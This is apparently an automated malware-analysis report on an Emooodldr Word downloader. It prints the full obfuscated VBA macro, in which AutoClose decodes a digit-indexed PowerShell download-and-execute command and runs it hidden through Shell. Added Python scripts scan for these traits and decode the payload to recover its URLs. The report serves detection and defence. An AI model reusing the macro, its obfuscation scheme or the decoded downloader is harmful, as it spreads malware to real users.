Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 dc8c82e7dd88d9d4…

MALICIOUS

Office (OOXML)

Size: 33.3 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000 (Word 2007)
First seen: 2019-04-18
MD5: 0b841d3ea970f05ddf1009711d82572d
SHA-1: 0317909ce88167641bda95d27d7890afe346d0ab
SHA-256: dc8c82e7dd88d9d42f2872fee149eb219b537c2f21035834bed17cd205f54a51
Risk Score: 244

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML (Word .docx) document carrying a VBA project whose only entry point is an AutoClose macro, which Word runs automatically when the document is closed, so the payload fires even if the recipient merely opens the file and closes it again. AutoClose does not call Shell directly: it passes a 774-digit string to delirio(), which consumes the digits two at a time and uses each pair as an index into the 59-character lookup table in critico() (the rullino array), then dispatches the decoded string by name through Application.Run to rischio(), which executes it with Shell(..., 0), i.e. in a hidden window. This indirection keeps the word Shell out of the auto-exec procedure and the real command line out of the module's plaintext strings. The decoded command is a cmd.exe /c powershell one-liner (-Exec Bypass -NoP) that downloads an executable into %APPDATA% with System.Net.WebClient.DownloadFile, launches it with Start-Process, issues a second DownloadString request whose result is discarded, and finally IEX-evaluates script fetched from a third URL. The document is therefore a pure downloader; the PowerShell stage (T1059.001, not among the techniques listed above) is what actually retrieves the payload. ClamAV detection confirms this as Doc.Malware.Emooodldr-6711604-0.

Heuristics (6)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    rischio() executes its string argument with Shell scippo, 0; window style 0 (vbHide) runs the command without a visible window.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto-execution entry point: Word runs Sub AutoClose() when the document is closed (Auto_Close is the Excel spelling of the same hook). It is the only procedure in the module that is invoked automatically.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    All six are XML namespace URIs declared in the package's WordprocessingML parts, not network indicators. The URLs the macro actually contacts are carried only inside the index-encoded digit string passed to delirio(), so they do not surface as extracted document URLs.
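The heuristics above are the kind of checks olevba-style triage applies to decoded VBA. As an added example (written for this page; not the analysis tooling's code and not oletools), the following Python runs the same three checks over a constructed, cut-down VBA module that mirrors this sample's structure, and adds the caveat a reviewer wants next to a "base64-like blob" label: a long all-digit literal sitting beside an Array() of single-character strings is a table-index encoding, not base64, so it should be decoded with the table, not with base64. The module text, the tag names (loosely modeled on the labels above) and the 64-character literal threshold are assumptions chosen for the demonstration.

```python
import re

# Auto-execution procedure names that Word and Excel run without any further
# user action once macros are enabled.  AutoClose (this sample's entry point)
# fires when a Word document is closed; Auto_Close is the Excel spelling.
AUTOEXEC_NAMES = {
    "autoopen", "autoclose", "autoexec", "autoexit", "autonew",
    "document_open", "document_close", "document_new",
    "auto_open", "auto_close", "workbook_open", "workbook_close",
}

# Execution sinks, plus the by-name indirection the sample uses to reach one.
# Each pattern matches the whole source line so the finding carries context.
SINK_PATTERNS = {
    "OLE_VBA_SHELL": r"^.*\bShell\b.*$",
    "VBA_APPLICATION_RUN": r"^.*\bApplication\.Run\b.*$",
    "VBA_CREATEOBJECT": r"^.*\bCreateObject\b.*$",
}

# Array() literal built from at least nine single-character strings: the shape
# of the lookup table that an index-encoded blob is decoded against.
CHAR_TABLE_RE = re.compile(r'Array\((?:\s*"[^"\n]"\s*,){8,}\s*"[^"\n]"\s*\)')

# Threshold (assumption) for "long" string literals worth classifying.
LONG_LITERAL_RE = re.compile(r'"([^"\n]{64,})"')


def classify_blob(literal: str) -> str:
    """Say what kind of encoding a long string literal most likely carries."""
    if literal.isdigit():
        # Even length is what a two-digits-per-character scheme produces.
        return "digit-index" if len(literal) % 2 == 0 else "digits"
    if len(literal) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", literal):
        return "base64-like"
    return "opaque"


def triage_vba(source: str) -> list:
    """Run the static checks over decoded VBA source and return findings."""
    findings = []
    proc_re = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)",
                         re.M | re.I)
    for m in proc_re.finditer(source):
        if m.group(1).lower() in AUTOEXEC_NAMES:
            findings.append({"tag": "OLE_VBA_AUTOEXEC",
                             "detail": f"auto-exec entry point {m.group(1)}()"})
    for tag, pattern in SINK_PATTERNS.items():
        for m in re.finditer(pattern, source, re.M | re.I):
            findings.append({"tag": tag, "detail": m.group(0).strip()[:80]})
    for m in CHAR_TABLE_RE.finditer(source):
        count = m.group(0).count('"') // 2  # two quotes per element
        findings.append({"tag": "CHAR_TABLE",
                         "detail": f"Array() of {count} single-character strings"})
    for m in LONG_LITERAL_RE.finditer(source):
        lit = m.group(1)
        findings.append({"tag": "LONG_LITERAL",
                         "detail": f"{classify_blob(lit)} ({len(lit)} chars)"})
    return findings


# Constructed test input (not the page's artifact): a cut-down module with the
# same shape as the sample's ThisDocument, i.e. a lookup table, a Shell wrapper
# and an AutoClose entry point reaching it through Application.Run.  The digit
# string is synthetic.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Public Function critico(serio As Integer) As String
 Dim rullino() As Variant
 rullino = Array(",", "l", "/", "$", "T", "W", "'", "1", "O", "D", "a", ":", "4", "n")
 critico = rullino(serio)
End Function

Public Function rischio(scippo As String)
  Shell scippo, 0
End Function

Sub AutoClose()
 Call Application.Run("rischio", delirio("000102030405060708091011121300010203040506070809101112130001020304050607080910111213"))
End Sub
'''

if __name__ == "__main__":
    for finding in triage_vba(SAMPLE_VBA):
        print(f"{finding['tag']:22} {finding['detail']}")
```

The CHAR_TABLE and LONG_LITERAL findings are meant to be read together: when both fire in the same module, the digit-index label tells the analyst to look for the decoder loop (here delirio()) rather than reaching for base64.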

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2461 bytes
SHA-256: 2df131f4297a1ec572b7bb77b0fe56aa20f230431f61f655c4c4cf23b57a2188
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob. The blob is the 774-digit literal passed to delirio(); despite the label it is not base64 but a sequence of two-digit indices into the rullino character table, so decode it with the table rather than with base64.
Preview of the extracted script (the viewer shows at most the first 1,000 lines; this 53-line module is shown in full):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function critico(serio As Integer) As String
 Dim rullino() As Variant
 rullino = Array(",", "l", "/", "$", "T", "W", "'", "1", "O", "D", "a", ":", "4", "n", "g", "m", "w", "c", "3", "?", "K", "C", "2", "N", "J", "-", ")", "\", "p", "8", "F", "i", "s", "S", ";", "r", "B", "u", "X", "v", " ", "d", "t", "o", "j", "y", "e", "E", "(", "P", "A", "x", "I", "=", "+", ".", "f", "h", "b")
 Dim sfoderare As Integer
 
 For sfoderare = LBound(rullino) To UBound(rullino)
   If sfoderare = serio Then
    critico = rullino(sfoderare)
   End If
 Next
 
End Function

Function chirurgo(monotono As String)
    monotono = StrConv(monotono, vbUnicode)
    chirurgo = Split(Left(monotono, Len(monotono) - 1), vbNullChar)
End Function

Function delirio(nordico As String) As String
  Dim inter As Integer
  Dim parola As String
  Dim berlina As Variant
  berlina = chirurgo(Trim(nordico))
  For sfoderare = 0 To Len(nordico)
  
    If (sfoderare + 1) <= UBound(berlina) Then
    Dim malinteso As String
    malinteso = berlina(sfoderare)
    sfoderare = sfoderare + 1
    malinteso = malinteso + berlina(sfoderare)
    
    parola = parola + critico(Int(malinteso))
    End If
  Next
  
  delirio = parola
End Function

Public Function rischio(scippo As String)
  Shell scippo, 0
End Function

Sub AutoClose()
 Call Application.Run("rischio", delirio("171541554651464002174028431646353257460101402547514617403645281032324025234349402521431515101341404823461625085844461742403345324246155523464255054658210131461342265509431613014310413031014648065742422811020210101341464614131046101345551743150213311343023237284635565515415606004003461339115049490950045040544006273620412455465146062634403342103542254935431746323240034613391150494909500450062736204124554651460634404823461625085844461742403345324246155523464255054658210131461342265509431613014310413342353113144806574242281102021010134146461413104610134555174315023255285728193141533237284635560626344052473848482346162508584446174240334532424615552346425505465821013146134226550943161301431041334235311314480657424228110202180755072912552218125507122902325528572806262634"))
End Sub
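To make the behaviour concrete, the following Python re-implements the sample's decoder (the critico() table lookup and the delirio() pair loop) and runs it over the exact digit string from the AutoClose macro above, then pulls the network and drop-path indicators out of the result. This is an added example written for this page, not code from the sample or from the analysis tooling; the table and the encoded string are copied verbatim from the extracted module, and extract_iocs() is a small helper written here for the demonstration (its regexes are tuned to this command line's quoting and are not a general PowerShell parser).

```python
import re

# Character table copied from the sample's critico() function (the rullino
# array).  Index i is the character that the two-digit pair "ii" decodes to.
RULLINO = [
    ",", "l", "/", "$", "T", "W", "'", "1", "O", "D",   # 0-9
    "a", ":", "4", "n", "g", "m", "w", "c", "3", "?",   # 10-19
    "K", "C", "2", "N", "J", "-", ")", "\\", "p", "8",  # 20-29
    "F", "i", "s", "S", ";", "r", "B", "u", "X", "v",   # 30-39
    " ", "d", "t", "o", "j", "y", "e", "E", "(", "P",   # 40-49
    "A", "x", "I", "=", "+", ".", "f", "h", "b",        # 50-58
]

# The 774-digit literal the sample's AutoClose macro passes to delirio(),
# split into 20-digit pieces purely for readability.
ENCODED = (
    "17154155465146400217" "40284316463532574601" "01402547514617403645"
    "28103232402523434940" "25214315151013414048" "23461625085844461742"
    "40334532424615552346" "42550546582101314613" "42265509431613014310"
    "41303101464806574242" "28110202101013414646" "14131046101345551743"
    "15021331134302323728" "46355655154156060040" "03461339115049490950"
    "04504054400627362041" "24554651460626344033" "42103542254935431746"
    "32324003461339115049" "49095004500627362041" "24554651460634404823"
    "46162508584446174240" "33453242461555234642" "55054658210131461342"
    "26550943161301431041" "33423531131448065742" "42281102021010134146"
    "46141310461013455517" "43150232552857281931" "41533237284635560626"
    "34405247384848234616" "25085844461742403345" "32424615552346425505"
    "46582101314613422655" "09431613014310413342" "35311314480657424228"
    "11020218075507291255" "22181255071229023255" "28572806262634"
)


def delirio(encoded: str, table=RULLINO) -> str:
    """Re-implementation of the sample's delirio()/critico() pair.

    The VBA walks the digit string two characters at a time, converts each
    pair with Int() and appends table(value).  Like the VBA loop, a trailing
    odd digit is ignored.  The VBA's critico() silently returns "" for an
    index past the table; raising instead makes it obvious when a blob from
    another sample was not encoded against this table.
    """
    if not encoded.isdigit():
        raise ValueError("delirio() input must be a pure digit string")
    out = []
    for i in range(0, len(encoded) - 1, 2):
        idx = int(encoded[i:i + 2])
        if idx >= len(table):
            raise ValueError(f"index {idx} at offset {i} is outside the "
                             f"{len(table)}-entry table")
        out.append(table[idx])
    return "".join(out)


def decode_sample() -> str:
    """Decode the command line this sample's AutoClose hands to Shell()."""
    return delirio(ENCODED)


def extract_iocs(command: str) -> dict:
    """Pull network and drop-path indicators out of the decoded command line."""
    urls = re.findall(r"""https?://[^\s'"()]+""", command)
    hosts = sorted({re.match(r"https?://([^/]+)", u).group(1) for u in urls})
    # Both spellings the sample uses: $env:APPDATA + '\x.exe' and $env:APPDATA'\x.exe'
    drop_paths = sorted(set(re.findall(r"\$env:APPDATA\s*\+?\s*'(\\[^']+)'", command)))
    return {"urls": urls, "hosts": hosts, "drop_paths": drop_paths}


if __name__ == "__main__":
    cmd = decode_sample()
    print(cmd)
    for key, values in extract_iocs(cmd).items():
        print(f"{key}: {values}")
```

The decoded string is the cmd.exe /c powershell one-liner described in the summary: a DownloadFile to $env:APPDATA\BKdJ.exe followed by Start-Process on that path, a DownloadString whose result is discarded, and a final IEX over a DownloadString from a third URL. The two hosts it yields (one domain, one bare IP) and the drop path are the indicators worth blocking or hunting for; they never appear in the document's plaintext, which is why the EMBEDDED_URL heuristic above lists only schema namespaces.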
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 11776 bytes
SHA-256: e2410f65041192ecc581e34489054297f43981758fe2738868184e0bbddc349d
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).